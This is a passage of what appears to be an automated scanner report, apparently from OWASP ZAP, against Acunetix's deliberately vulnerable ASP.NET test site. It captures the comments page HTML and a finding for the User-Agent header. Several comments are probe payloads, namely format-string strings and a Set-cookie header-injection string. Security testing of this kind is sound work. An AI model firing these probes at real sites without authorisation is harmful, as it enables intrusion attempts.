AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:49:09 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:51:08 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:10 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">ZAP %1!s%2!s%3!s%4!s%5!s%6!s%7!s%8!s%9!s%10!s%11!s%12!s%13!s%14!s%15!s%16!s%17!s%18!s%19!s%20!s%21!n%22!n%23!n%24!n%25!n%26!n%27!n%28!n%29!n%30!n%31!n%32!n%33!n%34!n%35!n%36!n%37!n%38!n%39!n%40!n </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:11 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:34 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:06 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">\|</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:37 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:22 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA">hvEYyWNN</textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Show / hide Request and Response
Request Header - size: 641 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1381 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,381 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=hvEYyWNN&btnS